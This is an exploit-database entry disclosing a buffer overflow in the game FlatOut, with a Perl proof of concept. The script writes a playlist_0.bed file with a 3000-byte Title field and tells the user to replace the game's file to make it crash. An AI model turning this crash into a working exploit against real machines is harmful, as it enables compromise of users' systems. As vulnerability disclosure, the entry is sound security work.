Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability

EDB-ID: 18173 CVE: 2011-5173 OSVDB-ID: 83328
Verified: Author: Silent_Dream Published: 2011-11-30
Download Exploit: Source Raw Download Vulnerable App: N/A
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7

#Tested on GOG.com copy of FlatOut.  Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..

my $file = "playlist_0.bed";
my $head = "Title	=	\"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop	= {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";